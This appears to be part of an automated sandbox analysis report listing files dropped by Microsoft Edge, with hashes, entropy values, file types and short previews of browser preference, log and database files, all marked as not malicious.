                                                                                                                                                                                                                                                                              SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                              SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                              SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40504
                                                                                                                                                                                                                                                                              Entropy (8bit):5.561330373188603
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:O55ill7pLGLhaUWPxZfMI8F1+UoAYDCx9Tuqh0VfUC9xbog/OVoG8DP/8rw8xkbO:O55ilzchaUWPxZfMIu1jaNG8D/18x0k1
                                                                                                                                                                                                                                                                              MD5:299629EFB5ECBBCFCA54A671541391B7
                                                                                                                                                                                                                                                                              SHA1:AE43F40388CFA9C543981BCF56382C47EADC733F
                                                                                                                                                                                                                                                                              SHA-256:F2FAF535782305101B2D94FD2779CADF529911E53589AC35C2931E37942F577C
                                                                                                                                                                                                                                                                              SHA-512:A06E072DB7852B7251CBD1894F6E764C1E5ABA1571A0363AE068B1F4E8921A3FF99583794127C5EE42482983FE91648058185178B939C250C3901E2D527C90F6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379154132664972","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379154132664972","location":5,"ma
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (17385), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):17389
                                                                                                                                                                                                                                                                              Entropy (8bit):5.495192700995294
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0J99QTryDiuabatSuypNspFyaNPWc+ktaNNPhACnNWcVCUD913nho68WbV+Fer:st0PGQSu4NspFtJWzVCU/nbGkQwQM
                                                                                                                                                                                                                                                                              MD5:9D28479D0522BB32B41E621C4AB6027D
                                                                                                                                                                                                                                                                              SHA1:49C1F34AE2669748EAB9F981AEDEBEAB271E27A6
                                                                                                                                                                                                                                                                              SHA-256:7CE4DFBE09CA399C0F28017197DD9C8CAC7662BE9C67CC3C546F94A4D87CD6BD
                                                                                                                                                                                                                                                                              SHA-512:AB59E82FB5E03B11D1516238D2EA0450007FEDB1D7224FA894F408DE207606F7625B98B06C8ABA3FC955C139996546F7B118A360B3D156E316BD0646FC1ED20C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                              Entropy (8bit):0.10296568495427846
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:+FxFt3FxgspEjVl/PnnnnnnnnnnnvoQ/Eou:+XFt3XFoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                              MD5:F2D4CA4BCEC046BB3810F6092816DDE1
                                                                                                                                                                                                                                                                              SHA1:3CBC255B81747BB0DE83E79CC9A57E199DF0F764
                                                                                                                                                                                                                                                                              SHA-256:753773058109B540A36BA2D9B401F03572A23B7808C7ACC740A48C3E2EC89C0B
                                                                                                                                                                                                                                                                              SHA-512:B2EC7516F00173BE83C31CA582BE144B37F25F6A6AAC0852E4EE4E86F8EDB52371C529F376B844451B48C6E04C2002C36AF2CB65D061DEC9E1AC78F951849878
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):317272
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8893815912293735
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:hWODer73U+xdcMb0n4OY5JOo17Mv8dyLyGoy5yE0yDxy6u:AwA
                                                                                                                                                                                                                                                                              MD5:9A63992B46487D730D87E3313671F0F6
                                                                                                                                                                                                                                                                              SHA1:2EAFD9D2FBD2D752691F6424EAD41ADCFDEE6983
                                                                                                                                                                                                                                                                              SHA-256:9C07BF40A0151DBC571BAC425E9803C04F29AE87A1086AE465EBA647F8CFC943
                                                                                                                                                                                                                                                                              SHA-512:834EA768CB322333D36056A6E3282248C8720CDCDC44FDAF5F1F6D176E72FA419AA028CFF1F184C6FDA295495B3435B09587B322C716F420E397BF3FFBC4C23E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):419
                                                                                                                                                                                                                                                                              Entropy (8bit):3.699260092783771
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuuhOsedhOXsn:llc8BOuuuuuuuuuuuuhD8Ss
                                                                                                                                                                                                                                                                              MD5:FB337CDD066C7731AFD3C439B49B82BC
                                                                                                                                                                                                                                                                              SHA1:DEBD2CD663E7A4BB098DF38C79052EF9689FABCB
                                                                                                                                                                                                                                                                              SHA-256:933D7B8A00938134E817A383D7943C57B2A922EBDBFFBB9AB6E1C3E26205EA16
                                                                                                                                                                                                                                                                              SHA-512:0EC0C4D179541DA1AC7AA2C3D659411AEE939635866316650C2FF79DBACC7DC1C86EDEDE3E1F1231010B8A07999BD890F53CC35C446DA4C28DF8BB61002177F2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                                                              Entropy (8bit):5.14039084859928
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxpFIq2PcNwi23oH+TcwtfrK+IFUt8IXfxpFZZmw+IXfxKkwOcNwi23oH+Tcwf:RrIvLZYeb23FUt86rZ/+6K54ZYeb3J
                                                                                                                                                                                                                                                                              MD5:FBE5DC65E9DB853B73F0D8288E518B14
                                                                                                                                                                                                                                                                              SHA1:1609C19E168F892003F0AC11D9F459709D0BF490
                                                                                                                                                                                                                                                                              SHA-256:E99743E0ADCE4C14B9FA6E78D18067634A150F36DC398427FE0D0F1E74A6ED48
                                                                                                                                                                                                                                                                              SHA-512:1204D73CCC6C04AC87B71FEEE741FAEA44AC5CBA9DC9BE9BB0AC0FF37CF3FAC9DA4F71B03D49AE9123D7F39934250ADD630E84079B4509A1F02B4E56C581DA68
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.334 1c04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/20-02:42:13.334 1c04 Recovering log #3.2024/12/20-02:42:13.335 1c04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):782
                                                                                                                                                                                                                                                                              Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                              MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                              SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                              SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                              SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):348
                                                                                                                                                                                                                                                                              Entropy (8bit):5.143408370593634
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxKJVRFIq2PcNwi23oH+TcwtfrzAdIFUt8IXfx/pZZmw+IXfx/pzkwOcNwi23q:RKbjIvLZYeb9FUt86b/+6x54ZYeb2J
                                                                                                                                                                                                                                                                              MD5:CCF79FE89DCCE9151C269903680A9C82
                                                                                                                                                                                                                                                                              SHA1:385C24B14928ACC99AFB6D23EF22CA11067F5D7A
                                                                                                                                                                                                                                                                              SHA-256:98C9AC8E3E756186497254CFA1DE05A4D0411EFCB340355A77E3910C5D7AA1DA
                                                                                                                                                                                                                                                                              SHA-512:1E4683E87E8A4B0AEBE04D4EE57639D9172252AE5473810A6E711CC32E79D5D7426941BB3655F76D4912724E18BE3B9D56CCA382EC82C3075793301A16A1FCDB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.326 1c04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/20-02:42:13.329 1c04 Recovering log #3.2024/12/20-02:42:13.329 1c04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):120
                                                                                                                                                                                                                                                                              Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                              MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:117.0.2045.47
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                              MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                              SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                              SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                              SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                              Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                              MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                              Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                              MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                              SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                              SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                              SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                                                                              Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                              MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                              SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                              SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                              SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):130439
                                                                                                                                                                                                                                                                              Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                              MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                              SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                              SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                              SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                              Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                              MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                              SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                              SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                              SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):57
                                                                                                                                                                                                                                                                              Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                              MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                              SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                              SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                              SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                              Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                              MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                              SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                              SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                              SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):575056
                                                                                                                                                                                                                                                                              Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
